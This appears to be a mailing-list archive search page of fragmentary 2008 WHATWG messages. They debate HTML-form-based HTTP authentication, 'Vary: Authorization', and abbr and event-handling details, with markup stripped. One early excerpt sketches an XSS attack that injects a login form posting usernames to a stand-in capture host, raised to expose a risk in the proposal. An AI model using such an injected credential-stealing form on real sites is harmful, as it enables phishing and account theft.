Ian Hickson wrote:
On Wed, 26 Nov 2008, Philip Taylor wrote:
If I'm not misunderstanding things, there is a new attack scenario:
I post a comment on someone's blog, saying a
href=/restricted-access.php?xsshole=form
action=http://hacker.example.com/capture name=logininput
name=usernameinput
Martin Atkins wrote:
...
I may be forgetting missing some use-cases here (I don't recall what
exactly motivated this custom auth scheme) but there may still be value
in a cut-down version of this scheme:
...
I concede that once you generalize it in this way it becomes even less
relevant
On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote:
Ok let me rephrase. What are the user agent requirements for processing
the realm value? For other schemes, it's basically show the realm to
the user as a hint as to what password is wanted.
The realm is (should be) part of the key used by
From: Ian Hickson [EMAIL PROTECTED]
Subject: Re: [whatwg] Feeedback on dfn, abbr, and other elements
related to cross-references
To: Calogero Alex Baldacchino [EMAIL PROTECTED]
Cc: WHAT Working Group whatwg@lists.whatwg.org
Message-ID: [EMAIL PROTECTED]
Content-Type: TEXT/PLAIN; charset=US-ASCII
On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote:
Julian Reschke wrote:
You can already handle the case of content that's available
unauthenticated, but would potentially differ in case of being authenticated
by adding
Vary: Authorization
to a response.
According to section 14.8
Thomas Broyer wrote:
...
Julian is saying that if your page varies depending on the user being
authenticated and/or the client not being authenticated at all, you
(the origin server) should include a Vary: Authorization.
This means that if a shared cache has cached the response to an
On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote:
Thomas Broyer wrote:
...
Actually, what's missing from HTTP is a way to ask you to authenticate
but allow anonymous authentication (others have proposed sending a
...
Could you define what anonymous authentication would mean precisely?
Thomas Broyer wrote:
I don't really mind, as long as the server is able to say I give you
this thing to you anonymous user, but you can also authenticate (e.g.
to be proposed more features). This is the exact use-case many web
site (including most if not all e-commerce web sites) are facing, and
Henri Sivonen wrote:
That seems like a bad optimization. Adding an off-the-shelf HTML parser
to a bot is much easier than tuning the general crawling functionality
and task-specific functionality of a bot.
I suspect this will require far more of the bot than merely parsing
HTML. Many login
On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote:
Thomas Broyer wrote:
I don't really mind, as long as the server is able to say I give you
this thing to you anonymous user, but you can also authenticate (e.g.
to be proposed more features). This is the exact use-case many web
site
Asbjørn Ulsberg wrote:
[Response 1]
HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML realm=Administration
!DOCTYPE html
html
form action=/login
input name=username
input type=password name=password
input type=submit
/form
/html
Interesting. If we go down
Julian Reschke wrote:
...
Actually, what's missing from HTTP is a way to ask you to authenticate
but allow anonymous authentication (others have proposed sending a
...
Could you define what anonymous authentication would mean precisely?
I'm not sure this is what the OP meant, but I'd
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL
PROTECTED] wrote:
Martin Atkins wrote:
Your auth token here seems to me to be equivalent to a session cookie.
Yes, it does. But since session cookies are just that: cookies -- it isn't. An
authentication token is
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL
PROTECTED] wrote:
Martin Atkins wrote:
Your auth token here seems to me to be equivalent to a session cookie.
Yes, it does. But since session cookies are just that: cookies -- it isn't. An
authentication token is
On Thu, 27 Nov 2008, Pentasis wrote:
Actually, it would solve a problem like this:
What if I style abbr so that the title attribute is shown after the
abbreviation:
abbr[title]:after {
content: (attr(title));
}
Now obviously I don't need and don't want to do this for every
On Thu, 27 Nov 2008 22:38:32 +0100, Garrett Smith [EMAIL PROTECTED]
wrote:
It is often desirable to capture events on bubble and interrogate the
EventTarget using a hasClassName function to see if it has a className
that the program is concerned with.
[...]
HTML5 already has the
Calogero Alex Baldacchino wrote:
That worked fine on Opera 9 and FF2, but, when tried on IE7, the show
became a little weird... the element was there, the style attribute was
regarded as for any other element (display:block worked), but didn't
applied to any of its descendents, as if they
17 matches
Mail list logo